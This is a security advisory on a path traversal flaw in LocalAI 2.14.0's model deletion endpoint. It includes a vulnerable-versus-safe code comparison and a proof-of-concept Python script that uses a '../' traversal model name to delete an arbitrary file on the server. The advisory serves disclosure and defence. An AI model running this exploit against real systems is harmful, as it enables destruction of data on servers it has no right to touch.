Path Traversal Vulnerability in Model Deletion Process
A path traversal vulnerability was identified in LocalAI version 2.14.0, allowing attackers to delete arbitrary files by exploiting the `model` parameter during the model deletion process. This issue was patched in version 2.16.0.
Published publicly on Jun 19, 2024
Threat Overview
The vulnerability arises from improper validation of user-supplied input in the `model` parameter during the model deletion process. An attacker can craft a request that manipulates the file path to point to a file outside of the intended models directory. This allows the attacker to delete files on the server, potentially leading to sensitive data loss or disruption of service.
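LocalAI itself is written in Go, but the flaw follows the classic unsanitized-path-join pattern. The Python sketch below illustrates that pattern and one common mitigation; the `MODELS_DIR` value and function names are illustrative assumptions, not LocalAI's actual code.

```python
import os

MODELS_DIR = "/opt/localai/models"  # illustrative models directory

def delete_model_unsafe(model_name: str) -> None:
    # VULNERABLE: the user-supplied name is joined straight into the path,
    # so a name like "../../../../../../../../tmp/deleteme.txt" escapes
    # MODELS_DIR and deletes an arbitrary file.
    os.remove(os.path.join(MODELS_DIR, model_name))

def delete_model_safe(model_name: str) -> None:
    # Mitigation: resolve the final path and verify it is still inside
    # the models directory before deleting anything.
    root = os.path.realpath(MODELS_DIR)
    target = os.path.realpath(os.path.join(root, model_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"path traversal attempt blocked: {model_name!r}")
    os.remove(target)
```

Resolving with `realpath` before the containment check matters: a prefix comparison on the unresolved string can be bypassed with `..` segments or symlinks, which is exactly what the traversal sequence above exploits.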
Attack Scenario
An attacker first creates a malicious configuration file specifying a path traversal sequence (`../../../../../../../../tmp/deleteme.txt`) as the model name. They then start a Python HTTP server to host this configuration. Using the LocalAI API, the attacker applies this configuration, causing the application to register the model. Finally, the attacker sends a request to delete the model, which results in the deletion of the specified file on the server.
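A minimal proof-of-concept sketch of this scenario follows. The endpoint paths (`/models/apply`, `/models/delete/...`), the payload fields, and the addresses are assumptions made for illustration; consult the LocalAI API documentation for your version for the exact requests, and only run this against a disposable instance you own.

```python
# PoC sketch only; endpoints, payload fields, and addresses are assumptions.
import http.server
import json
import socketserver
import threading
import urllib.parse
import urllib.request

TRAVERSAL_NAME = "../../../../../../../../tmp/deleteme.txt"
LOCALAI = "http://127.0.0.1:8080"  # assumed LocalAI address

# Step 1: write a model config whose name is a path traversal sequence.
with open("malicious.yaml", "w") as f:
    f.write(f'name: "{TRAVERSAL_NAME}"\n')

# Step 2: host the config on a throwaway local HTTP server.
server = socketserver.TCPServer(("127.0.0.1", 8000),
                                http.server.SimpleHTTPRequestHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

# Step 3: ask LocalAI to apply the hosted config, registering the "model".
apply_req = urllib.request.Request(
    f"{LOCALAI}/models/apply",  # assumed endpoint
    data=json.dumps({"config_url": "http://127.0.0.1:8000/malicious.yaml"}).encode(),
    headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(apply_req)

# Step 4: delete the registered model; the unvalidated name resolves to
# /tmp/deleteme.txt on the server, which gets removed.
encoded = urllib.parse.quote(TRAVERSAL_NAME, safe="")
delete_req = urllib.request.Request(
    f"{LOCALAI}/models/delete/{encoded}",  # assumed endpoint
    method="DELETE",
)
urllib.request.urlopen(delete_req)
```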
Who Is Affected
Administrators and users of LocalAI version 2.14.0 are affected by this vulnerability. The risk is particularly high on systems where sensitive files are accessible to the LocalAI server process, since an attacker can then delete those files arbitrarily.